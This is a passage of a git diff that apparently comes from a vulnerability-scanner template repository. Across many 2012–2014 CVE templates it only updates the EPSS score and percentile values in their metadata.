cpe:2.3:a:websitepanel:websitepanel:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index 915797b17b..5607523a36 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2012-4242 cwe-id: CWE-79 epss-score: 0.00216 - epss-percentile: 0.5888 + epss-percentile: 0.59273 cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:0.9.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 8a6ed1bde7..cb2cd909ce 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -18,8 +18,8 @@ info: cvss-score: 4.3 cve-id: CVE-2012-4253 cwe-id: CWE-22 - epss-score: 0.03411 - epss-percentile: 0.9021 + epss-score: 0.02906 + epss-percentile: 0.89636 cpe: cpe:2.3:a:mysqldumper:mysqldumper:1.24.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index d3e8795149..f57aceffdd 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-4273 cwe-id: CWE-79 epss-score: 0.00252 - epss-percentile: 0.62364 + epss-percentile: 0.62781 cpe: cpe:2.3:a:ppfeufer:2-click-social-media-buttons:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index 783b071d71..3290aa71aa 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2012-4547 cwe-id: CWE-79 epss-score: 0.0023 - epss-percentile: 0.60499 + epss-percentile: 0.60898 cpe: cpe:2.3:a:laurent_destailleur:awstats:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index f54715f549..8c942f3d82 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-4768 cwe-id: CWE-79 epss-score: 0.00922 - epss-percentile: 0.80933 + epss-percentile: 0.81145 cpe: cpe:2.3:a:mikejolley:download_monitor:3.3.5.7:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index bdae8173e9..f49b82acac 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5 cve-id: CVE-2012-4878 cwe-id: CWE-22 - epss-score: 0.01193 - epss-percentile: 0.83395 + epss-score: 0.00954 + epss-percentile: 0.81488 cpe: cpe:2.3:a:flatnux:flatnux:2011-08-09-2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index 99d165329b..1cf841221b 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -17,8 +17,8 @@ info: cvss-score: 4.3 cve-id: CVE-2012-4889 cwe-id: CWE-79 - epss-score: 0.02518 - epss-percentile: 0.88764 + epss-score: 0.03526 + epss-percentile: 0.90466 cpe: cpe:2.3:a:manageengine:firewall_analyzer:7.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index 721f35973b..74cea5ac75 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.4 cve-id: CVE-2012-4940 cwe-id: CWE-22 - epss-score: 0.05321 - epss-percentile: 0.92093 + epss-score: 0.04527 + epss-percentile: 0.9154 cpe: cpe:2.3:a:gecad:axigen_free_mail_server:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index ce0a2a0c76..2dd94d3a39 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-4982 cwe-id: CWE-20 epss-score: 0.00748 - epss-percentile: 0.78628 + epss-percentile: 0.78844 cpe: cpe:2.3:a:forescout:counteract:6.3.4.10:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index dd0a23a854..12331292f6 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-5321 cwe-id: CWE-20 epss-score: 0.02634 - epss-percentile: 0.88997 + epss-percentile: 0.8914 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:8.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index 016edb6791..929b1117c8 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-5913 cwe-id: CWE-79 epss-score: 0.00828 - epss-percentile: 0.79806 + epss-percentile: 0.8003 cpe: cpe:2.3:a:wordpress_integrator_project:wordpress_integrator:1.32:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index af0a0420f5..d4cd940123 100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-6499 cwe-id: CWE-20 epss-score: 0.01204 - epss-percentile: 0.83485 + epss-percentile: 0.83662 cpe: cpe:2.3:a:age_verification_project:age_verification:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index 439b8a9903..67a6a6ed81 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2013-1965 cwe-id: CWE-94 epss-score: 0.00813 - epss-percentile: 0.79616 + epss-percentile: 0.79855 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index 781bcf578a..9a1c5cacde 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.8 cve-id: CVE-2013-2248 cwe-id: CWE-20 - epss-score: 0.9734 - epss-percentile: 0.99824 + epss-score: 0.97289 + epss-percentile: 0.99811 cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index c41c320328..64a34d77b0 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2013-2251 cwe-id: CWE-20 epss-score: 0.97432 - epss-percentile: 0.99902 + epss-percentile: 0.99918 cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 9 diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 5084c52336..226e014d27 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2013-2287 cwe-id: CWE-79 epss-score: 0.00219 - epss-percentile: 0.59185 + epss-percentile: 0.59581 cpe: cpe:2.3:a:roberta_bramski:uploader:1.0.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml index 58a18da05f..1f5c952983 100644 --- a/http/cves/2013/CVE-2013-2621.yaml +++ b/http/cves/2013/CVE-2013-2621.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2013-2621 cwe-id: CWE-601 epss-score: 0.03568 - epss-percentile: 0.90403 + epss-percentile: 0.90516 cpe: cpe:2.3:a:telaen_project:telaen:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index 1703425ab4..01f8404cc3 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2013-3526 cwe-id: CWE-79 epss-score: 0.00431 - epss-percentile: 0.71323 + epss-percentile: 0.71623 cpe: cpe:2.3:a:wptrafficanalyzer:trafficanalyzer:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index 3c8efa4ee6..a647a81648 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2013-3827 cwe-id: NVD-CWE-noinfo epss-score: 0.73399 - epss-percentile: 0.97675 + epss-percentile: 0.9774 cpe: cpe:2.3:a:oracle:fusion_middleware:2.1.1:*:*:*:*:*:*:* metadata: max-request: 10 diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 296cc84781..282197cfc8 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2013-4117 cwe-id: CWE-79 epss-score: 0.01217 - epss-percentile: 0.83576 + epss-percentile: 0.83752 cpe: cpe:2.3:a:anshul_sharma:category-grid-view-gallery:2.3.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index 77e759b62a..6f671db79d 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2013-4625 cwe-id: CWE-79 epss-score: 0.01217 - epss-percentile: 0.83576 + epss-percentile: 0.83752 cpe: cpe:2.3:a:cory_lamle:duplicator:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-5528.yaml b/http/cves/2013/CVE-2013-5528.yaml index bb216b2fc9..a3d0eec3b2 100644 --- a/http/cves/2013/CVE-2013-5528.yaml +++ b/http/cves/2013/CVE-2013-5528.yaml @@ -16,8 +16,8 @@ info: cvss-score: 4 cve-id: CVE-2013-5528 cwe-id: CWE-22 - epss-score: 0.00442 - epss-percentile: 0.71682 + epss-score: 0.00565 + epss-percentile: 0.75203 cpe: cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index 734c242e92..47ee56e2a0 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2013-5979 cwe-id: CWE-22 epss-score: 0.06969 - epss-percentile: 0.93073 + epss-percentile: 0.93174 cpe: cpe:2.3:a:springsignage:xibo:1.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index b736bf450b..f2a1ba58ad 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2013-6281 cwe-id: CWE-79 epss-score: 0.00209 - epss-percentile: 0.5816 + epss-percentile: 0.58559 cpe: cpe:2.3:a:dhtmlx:dhtmlxspreadsheet:2.0:-:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index 4378843f5e..a4f84f1ff4 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2013-7091 cwe-id: CWE-22 epss-score: 0.97375 - epss-percentile: 0.99856 + epss-percentile: 0.99871 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:6.0.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index fdc08b7c1c..34814efae6 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5 cve-id: CVE-2013-7240 cwe-id: CWE-22 - epss-score: 0.19842 - epss-percentile: 0.95661 + epss-score: 0.25635 + epss-percentile: 0.96134 cpe: cpe:2.3:a:westerndeal:advanced_dewplayer:1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index 8fd790c066..afc554ffcf 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2013-7285 cwe-id: CWE-78 epss-score: 0.33561 - epss-percentile: 0.96488 + epss-percentile: 0.96538 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-10037.yaml b/http/cves/2014/CVE-2014-10037.yaml index 633a147679..d24efaf64f 100644 --- a/http/cves/2014/CVE-2014-10037.yaml +++ b/http/cves/2014/CVE-2014-10037.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-10037 cwe-id: CWE-22 epss-score: 0.18676 - epss-percentile: 0.95552 + epss-percentile: 0.95631 cpe: cpe:2.3:a:domphp:domphp:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index 781ab8ce15..7e4e390e01 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-1203 cwe-id: CWE-77 epss-score: 0.02045 - epss-percentile: 0.87539 + epss-percentile: 0.87696 cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index a5822163de..3912439a2a 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-2321 cwe-id: CWE-264 epss-score: 0.96364 - epss-percentile: 0.99354 + epss-percentile: 0.99388 cpe: cpe:2.3:h:zte:f460:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml index 0bc851ac31..292df811a4 100644 --- a/http/cves/2014/CVE-2014-2323.yaml +++ b/http/cves/2014/CVE-2014-2323.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2014-2323 cwe-id: CWE-89 - epss-score: 0.96912 - epss-percentile: 0.99594 + epss-score: 0.96758 + epss-percentile: 0.99546 cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index cfde8c0f73..3f72404390 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-2383 cwe-id: CWE-200 epss-score: 0.00723 - epss-percentile: 0.78237 + epss-percentile: 0.78461 cpe: cpe:2.3:a:dompdf:dompdf:*:beta3:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index 9e6c00a923..5057fa95d9 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-2908 cwe-id: CWE-79 epss-score: 0.00594 - epss-percentile: 0.75612 + epss-percentile: 0.75901 cpe: cpe:2.3:o:siemens:simatic_s7_cpu_1200_firmware:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index 4cb30ccc8f..3b9cb2223d 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-2962 cwe-id: CWE-22 epss-score: 0.95825 - epss-percentile: 0.99198 + epss-percentile: 0.9924 cpe: cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index 298e21947b..e9f8cf2b83 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-3120 cwe-id: CWE-284 epss-score: 0.55248 - epss-percentile: 0.97201 + epss-percentile: 0.97252 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 09e2e4550f..83588f6bbc 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-3206 cwe-id: CWE-20 epss-score: 0.54379 - epss-percentile: 0.9718 + epss-percentile: 0.9723 cpe: cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2014/CVE-2014-3704.yaml b/http/cves/2014/CVE-2014-3704.yaml index ae1be6b91c..1c5ad18fb1 100644 --- a/http/cves/2014/CVE-2014-3704.yaml +++ b/http/cves/2014/CVE-2014-3704.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2014-3704 cwe-id: CWE-89 - epss-score: 0.97529 - epss-percentile: 0.99982 + epss-score: 0.97533 + epss-percentile: 0.99989 cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index f8682b9864..5f344d1705 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-3744 cwe-id: CWE-22 epss-score: 0.00672 - epss-percentile: 0.77222 + epss-percentile: 0.77492 cpe: cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index ed1cc09291..47c230a05e 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-4210 cwe-id: NVD-CWE-noinfo epss-score: 0.96955 - epss-percentile: 0.99613 + epss-percentile: 0.99629 cpe: cpe:2.3:a:oracle:fusion_middleware:10.0.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index bd377386a4..6eb396a391 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2014-4513 cwe-id: CWE-79 epss-score: 0.00145 - epss-percentile: 0.49694 + epss-percentile: 0.50061 cpe: cpe:2.3:a:activehelper:activehelper_livehelp_live_chat:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index 8f2d0fe455..5b0a3ccbab 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4535 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47998 + epss-percentile: 0.48363 cpe: cpe:2.3:a:import_legacy_media_project:import_legacy_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index 58b5bfde91..7814c49baf 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-4536 cwe-id: CWE-79 epss-score: 0.00149 - epss-percentile: 0.50284 + epss-percentile: 0.50666 cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index 4dc93cd1e0..ac76b146f4 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4539 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47998 + epss-percentile: 0.48363 cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index d367d7a6ce..e1b9c5ec8e 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4544 cwe-id: CWE-79 epss-score: 0.00118 - epss-percentile: 0.45006 + epss-percentile: 0.4539 cpe: cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index 50c9d3dacb..62fa81b06d 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4550 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47998 + epss-percentile: 0.48363 cpe: cpe:2.3:a:visualshortcodes:ninja:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index 41fdb0aff0..e4985a21f6 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4558 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47998 + epss-percentile: 0.48363 cpe: cpe:2.3:a:cybercompany:swipehq-payment-gateway-woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index f7e87c7031..65432c9ef8 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4561 cwe-id: CWE-79 epss-score: 0.00098 - epss-percentile: 0.40032 + epss-percentile: 0.40337 cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml index 1a1b7a6c3f..3bd154c5e7 100644 --- a/http/cves/2014/CVE-2014-4592.yaml +++ b/http/cves/2014/CVE-2014-4592.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-4592 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47998 + epss-percentile: 0.48363 cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index 1840287d97..1d96f13913 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4940 cwe-id: CWE-22 epss-score: 0.03891 - epss-percentile: 0.90789 + epss-percentile: 0.90906 cpe: cpe:2.3:a:tera_charts_plugin_project:tera-charts:0.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml index f668c8fa04..2d2cfebb9f 100644 --- a/http/cves/2014/CVE-2014-4942.yaml +++ b/http/cves/2014/CVE-2014-4942.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-4942 cwe-id: CWE-200 epss-score: 0.01024 - epss-percentile: 0.81955 + epss-percentile: 0.82123 cpe: cpe:2.3:a:levelfourdevelopment:wp-easycart:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml index b9393b690a..c281c62f46 100644 --- a/http/cves/2014/CVE-2014-5111.yaml +++ b/http/cves/2014/CVE-2014-5111.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-5111 cwe-id: CWE-22 epss-score: 0.0445 - epss-percentile: 0.91352 + epss-percentile: 0.91446 cpe: cpe:2.3:a:netfortris:trixbox:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index 34b7f96890..4a48385c89 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-5258 cwe-id: CWE-22 epss-score: 0.01386 - epss-percentile: 0.84675 + epss-percentile: 0.84839 cpe: cpe:2.3:a:webedition:webedition_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 7940e9db3d..f1b0e5e4e6 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5 cve-id: CVE-2014-5368 cwe-id: CWE-22 - epss-score: 0.08268 - epss-percentile: 0.93532 + epss-score: 0.09191 + epss-percentile: 0.93972 cpe: cpe:2.3:a:wp_content_source_control_project:wp_content_source_control:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml index 6221e4c4db..94a8a28c57 100644 --- a/http/cves/2014/CVE-2014-6271.yaml +++ b/http/cves/2014/CVE-2014-6271.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-6271 cwe-id: CWE-78 epss-score: 0.97566 - epss-percentile: 0.99997 + epss-percentile: 0.99998 cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:* metadata: max-request: 8 diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml index b3cf6ac4ce..73a1d55550 100644 --- a/http/cves/2014/CVE-2014-6287.yaml +++ b/http/cves/2014/CVE-2014-6287.yaml @@ -20,7 +20,7 @@ info: cve-id: 'CVE-2014-6287' cwe-id: CWE-94 epss-score: 0.97289 - epss-percentile: 0.99787 + epss-percentile: 0.99811 cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index 18c686dbd4..696f196e54 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-6308 cwe-id: CWE-22 epss-score: 0.0922 - epss-percentile: 0.93887 + epss-percentile: 0.9398 cpe: cpe:2.3:a:osclass:osclass:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index 5d4f4c111a..34baa32da0 100644 --- a/http/cves/2014/CVE-2014-8676.yaml 